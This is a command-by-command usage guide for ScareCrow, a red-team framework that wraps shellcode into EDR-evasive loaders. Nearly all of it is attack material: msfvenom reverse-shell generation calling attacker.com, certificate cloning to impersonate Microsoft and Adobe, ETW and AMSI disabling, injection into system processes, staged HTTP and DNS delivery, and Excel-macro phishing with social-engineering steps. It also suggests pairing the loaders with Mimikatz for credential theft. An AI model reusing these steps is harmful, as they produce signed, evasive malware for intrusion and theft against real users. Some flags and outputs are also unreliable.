ScareCrow
ScareCrow is a powerful payload creation framework designed to generate EDR-evasive loaders that bypass detection through code signing, process injection, and advanced execution techniques. Built by Optiv, it supports multiple delivery mechanisms and loader types for flexible red team operations.
Installation
Sección titulada «Installation»Prerequisites
Sección titulada «Prerequisites»# Install required dependencies (Debian/Ubuntu)
sudo apt-get install mingw-w64 osslsigncode openssl golang-go
# On macOS
brew install mingw-w64 osslsigncode openssl go
# On CentOS/RHEL
sudo yum install mingw-w64-gcc mingw-w64-gcc-c++ openssl golangBuild from Source
Sección titulada «Build from Source»# Clone ScareCrow repository
git clone https://github.com/optiv/ScareCrow.git
cd ScareCrow
# Build the binary (requires Go 1.16+)
go build -o ScareCrow main.go
# Verify installation
./ScareCrow -hQuick Install via Go
Sección titulada «Quick Install via Go»# Install directly to $GOPATH/bin
go install github.com/optiv/ScareCrow@latest
# Add to PATH if needed
export PATH=$PATH:$(go env GOPATH)/binQuick Start
Sección titulada «Quick Start»Generate a basic loader from msfvenom shellcode:
# Generate shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw > payload.bin
# Create signed loader
./ScareCrow -I payload.bin -domain microsoft.com -delivery http
# Output files created:
# - loader.exe (main loader)
# - loader.exe.sig (signature)
# - loader.c (C source code)Loader Types
Sección titulada «Loader Types»| Type | Flag | Description | Best For |
|---|---|---|---|
| Binary | -Loader binary | Standalone executable | Direct execution, reverse shells |
| DLL | -Loader dll | Dynamic library for sideloading | DLL injection, process hollowing |
| COM Object | -Loader control | COM control object (.scr) | Screensaver execution, UAC bypass |
| Excel Macro | -Loader excel | Excel-based delivery | Phishing documents, macro execution |
| MSIExec | -Loader msiexec | Windows Installer wrapper | Code execution via MSI, UAC bypass |
| WScript | -Loader wscript | Windows Script Host wrapper | VBScript/JScript execution, LOLBin abuse |
DLL Side-Loading Example
Sección titulada «DLL Side-Loading Example»# Create DLL for side-loading
./ScareCrow -I payload.bin -Loader dll -domain adobe.com -delivery http
# Use legitimate application to load malicious DLL
# Place loader.dll next to legitimate application
# When legitimate app runs, it loads our malicious DLLExcel Macro Delivery
Sección titulada «Excel Macro Delivery»# Generate Excel-compatible loader
./ScareCrow -I payload.bin -Loader excel -domain microsoft.com
# Creates VBA macro that executes loader
# Can be embedded in .xls/.xlsm documentsInput Formats
Sección titulada «Input Formats»Raw Shellcode Input
Sección titulada «Raw Shellcode Input»# Using -I flag for raw binary shellcode
./ScareCrow -I payload.bin -domain company.com
# Generate from various shellcode sources
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 -f raw > payload.bin
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=8080 -f raw > shell.binMetasploit Integration
Sección titulada «Metasploit Integration»# Generate shellcode directly from msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=attacker.com LPORT=4444 \
-f raw | ./ScareCrow -I /dev/stdin -domain microsoft.com
# For 32-bit payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=target.com LPORT=4444 \
-f raw > x86.bin && ./ScareCrow -I x86.binCobalt Strike Shellcode
Sección titulada «Cobalt Strike Shellcode»# Export from Cobalt Strike beacon
# Generate raw shellcode from beacon export
./ScareCrow -I beacon.bin -domain cloud.microsoft.com -delivery httpCode Signing
Sección titulada «Code Signing»Domain-Based Certificate Cloning
Sección titulada «Domain-Based Certificate Cloning»# Sign with cloned certificate from domain
./ScareCrow -I payload.bin -domain microsoft.com -valid 365
# ScareCrow clones legitimate certificate from specified domain
# Creates trusted signature that bypasses SmartScreen
# Alternative domains for cloning:
# microsoft.com, apple.com, adobe.com, google.com, github.comCertificate Options
Sección titulada «Certificate Options»# Sign without specific domain (self-signed)
./ScareCrow -I payload.bin
# Specify validity period (days)
./ScareCrow -I payload.bin -domain adobe.com -valid 90
# Use custom certificate (if available)
./ScareCrow -I payload.bin -domain company.comWhy Code Signing Matters
Sección titulada «Why Code Signing Matters»Signed loaders bypass numerous defenses:
- SmartScreen warning suppression
- Code signature validation in EDRs
- Windows Defender Application Guard bypass
- Trust indicators in file properties
Encryption
Sección titulada «Encryption»Encryption Modes
Sección titulada «Encryption Modes»# AES-256 encryption (default, recommended)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode AES
# ELZMA compression + encryption (smaller file size)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode ELZMA
# XOR encryption (fastest, less secure)
./ScareCrow -I payload.bin -encryptionmode XORFile Size Comparison
Sección titulada «File Size Comparison»# AES: ~180KB (best compatibility)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode AES
# ELZMA: ~120KB (compressed)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode ELZMA
# XOR: ~140KB (fast)
./ScareCrow -I payload.bin -encryptionmode XORProcess Injection
Sección titulada «Process Injection»Injection Techniques
Sección titulada «Injection Techniques»# Self-injection (no parent process)
./ScareCrow -I payload.bin -injection self -domain microsoft.com
# Parent process injection (masquerade as another process)
./ScareCrow -I payload.bin -injection process -process svchost.exe
# Target specific process for injection
./ScareCrow -I payload.bin -injection process -process notepad.exeProcess Injection Tactics
Sección titulada «Process Injection Tactics»# Inject into legitimate system processes
./ScareCrow -I payload.bin -injection process -process svchost.exe -domain microsoft.com
./ScareCrow -I payload.bin -injection process -process taskhostw.exe -domain adobe.com
./ScareCrow -I payload.bin -injection process -process explorer.exe -domain apple.com
# Self-injection for standalone execution
./ScareCrow -I payload.bin -injection self -domain microsoft.comProcess Selection Tips
Sección titulada «Process Selection Tips»svchost.exe- System service host (trusted)taskhostw.exe- Task Scheduler host (legitimate)explorer.exe- Windows Explorer (common)winlogon.exe- Logon process (high privilege)lsass.exe- Local Security Authority (protected)
Delivery Options
Sección titulada «Delivery Options»HTTP Delivery
Sección titulada «HTTP Delivery»# Remote URL retrieval
./ScareCrow -I payload.bin -delivery http -url http://attacker.com/loader.exe \
-domain microsoft.com
# Staged delivery - loader downloads payload from URL
./ScareCrow -I payload.bin -delivery httpDNS Delivery
Sección titulada «DNS Delivery»# DNS-based payload retrieval
./ScareCrow -I payload.bin -delivery dns -domain attacker.com
# Useful in restricted networks where HTTP is blocked
# Requires DNS exfiltration/command infrastructureURL-Based Delivery
Sección titulada «URL-Based Delivery»# Specify custom delivery URL
./ScareCrow -I payload.bin -url http://internal.corp/updates/loader.exe \
-delivery http -domain microsoft.com
# File will be downloaded from specified URL at runtimeNo Internet Delivery
Sección titulada «No Internet Delivery»# Embed payload directly (no remote retrieval)
./ScareCrow -I payload.bin -domain microsoft.com
# Useful for offline or isolated environmentsEDR Evasion Techniques
Sección titulada «EDR Evasion Techniques»ETW (Event Tracing for Windows) Patching
Sección titulada «ETW (Event Tracing for Windows) Patching»# Disable ETW logging
./ScareCrow -I payload.bin -domain microsoft.com -noetw
# Prevents Event Tracing for Windows from logging execution
# Avoids triggering ETW-based detection rulesAMSI Bypass
Sección titulada «AMSI Bypass»# Bypass AMSI (Antimalware Scan Interface)
./ScareCrow -I payload.bin -domain microsoft.com -noamsi
# Allows shellcode execution without AMSI scanning
# Particularly effective for PowerShell/VBS payloadsSleep Obfuscation
Sección titulada «Sleep Obfuscation»# Obfuscate Sleep calls to evade timeout detection
./ScareCrow -I payload.bin -domain microsoft.com -nosleep
# Sleep API is hooked by many EDRs
# Obfuscation prevents detection of sleep patternsCombined Evasion
Sección titulada «Combined Evasion»# Maximum evasion configuration
./ScareCrow -I payload.bin -domain microsoft.com \
-noetw -noamsi -nosleep -encryptionmode AES
# Combines multiple evasion techniques
# Most effective against modern EDR solutionsAdditional Evasion
Sección titulada «Additional Evasion»- Direct syscall execution (bypasses hooked APIs)
- Unhooking kernel32 functions
- Hardware breakpoint detection bypass
- Sandbox evasion checks
- Timing-based detection avoidance
Advanced Options
Sección titulada «Advanced Options»Custom Passwords
Sección titulada «Custom Passwords»# Use custom encryption password
./ScareCrow -I payload.bin -password "SecurePass123!" -domain microsoft.com
# Password-protects the generated loaderConsole Output Control
Sección titulada «Console Output Control»# Show console window during execution
./ScareCrow -I payload.bin -console -domain microsoft.com
# Hide console (default for stealthy execution)
./ScareCrow -I payload.bin -domain microsoft.comSandbox Evasion
Sección titulada «Sandbox Evasion»# Enable sandbox evasion checks
./ScareCrow -I payload.bin -domain microsoft.com
# Detects and avoids common sandbox environments
# Checks for: VirtualBox, VMware, Hyper-V, QEMUFile Output Control
Sección titulada «File Output Control»# Specify custom output filename
./ScareCrow -I payload.bin -out custom_loader.exe -domain microsoft.com
# Change output directory
./ScareCrow -I payload.bin -o /tmp/output/ -domain microsoft.comComplete Workflow Examples
Sección titulada «Complete Workflow Examples»Cobalt Strike Integration
Sección titulada «Cobalt Strike Integration»# 1. Generate Cobalt Strike shellcode
# Export beacon -> generate shellcode -> save as cs.bin
# 2. Create ScareCrow loader
./ScareCrow -I cs.bin -domain microsoft.com -delivery http \
-injection process -process svchost.exe -noetw -noamsi
# 3. Host on web server
# Place loader.exe on HTTP server
# 4. Deliver via social engineering
# Email, USB, shared drive, etc.Sliver Integration
Sección titulada «Sliver Integration»# 1. Generate Sliver implant shellcode
sliver > generate --mtls localhost --format shellcode > sliver.bin
# 2. Create loader
./ScareCrow -I sliver.bin -domain apple.com -encryptionmode ELZMA \
-injection self -noetw
# 3. Execute on target
# ./loader.exe (connects back to Sliver server)Metasploit Multi-Stage
Sección titulada «Metasploit Multi-Stage»# 1. Generate msfvenom shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 \
LPORT=4444 -f raw > msfvenom.bin
# 2. Create signed loader
./ScareCrow -I msfvenom.bin -domain adobe.com -delivery http \
-injection process -process explorer.exe -nosleep
# 3. Set up Metasploit listener
# use exploit/multi/handler
# set LHOST 10.10.10.10
# set LPORT 4444
# exploitExcel-Based Phishing
Sección titulada «Excel-Based Phishing»# 1. Generate payload
./ScareCrow -I payload.bin -Loader excel -domain microsoft.com
# 2. Create Excel document
# Insert generated macro into Excel
# 3. Social engineer target
# Send as email attachment, mention "Enable Macros"Troubleshooting
Sección titulada «Troubleshooting»Build Errors
Sección titulada «Build Errors»# Missing Go installation
# Solution: Install Go 1.16+ from golang.org
# Cannot find mingw-w64
# Solution: apt-get install mingw-w64
# openssl not found
# Solution: apt-get install opensslCompilation Failures
Sección titulada «Compilation Failures»# "Invalid argument" error
# Solution: Check shellcode validity - ensure raw binary format
# "Certificate error" when signing
# Solution: Verify domain is reachable, has valid certificate
# File generation issues
# Solution: Check write permissions in current directoryPayload Execution Issues
Sección titulada «Payload Execution Issues»# Loader doesn't execute
# Solution: Verify shellcode format, try different injection method
# EDR blocking execution
# Solution: Enable -noetw -noamsi -nosleep flags
# Process injection fails
# Solution: Ensure target process exists, use -injection self as fallbackSize Issues
Sección titulada «Size Issues»# Loader too large (> 10MB)
# Solution: Use -encryptionmode ELZMA to compress
# Output binary still detected
# Solution: Recombine with fresh domain signing, change encryption modeBest Practices
Sección titulada «Best Practices»Operational Security
Sección titulada «Operational Security»- Always use code signing with legitimate-looking domains
- Rotate domains between campaigns
- Test payloads in isolated lab environment first
- Monitor for detection patterns on target systems
- Use staged delivery when network allows
Evasion Strategy
Sección titulada «Evasion Strategy»- Combine multiple evasion techniques (-noetw, -noamsi, -nosleep)
- Vary loader types between targets
- Use process injection into trusted system processes
- Implement sleep obfuscation for long-running operations
- Test against target’s specific EDR solution
Payload Selection
Sección titulada «Payload Selection»- Match shellcode size to target constraints
- Use x64 when possible (64-bit Windows is default)
- Consider network bandwidth for large payloads
- Test callback connectivity before deployment
- Plan for multiple payload attempts
Post-Exploitation
Sección titulada «Post-Exploitation»- Monitor injected process for suspicious behavior
- Use encrypted communications for C2
- Implement proper logging and audit trails
- Clean up artifacts after operation completion
- Document all activities for IR purposes
Related Tools
Sección titulada «Related Tools»| Tool | Purpose | Use Case |
|---|---|---|
| Donut | Shellcode generation from .NET | .NET assembly execution |
| PEzor | PE obfuscation and evasion | Binary obfuscation |
| Freeze | Anti-debug and anti-analysis | Detection evasion |
| NimCrypt2 | Nim-based encryption | Alternative language approach |
| shhhloader | Shellcode loader framework | Custom loader development |
| Sliver | C2 framework alternative | Command and control |
| Cobalt Strike | Commercial C2 framework | Full-featured red team operations |
Complementary Techniques
Sección titulada «Complementary Techniques»- Use with Atomics Red Team for evasion testing
- Combine with LOLBAS for execution
- Integrate with Covenant C2 framework
- Pair with Mimikatz for credential theft
- Deploy alongside Empire/PowerEmpire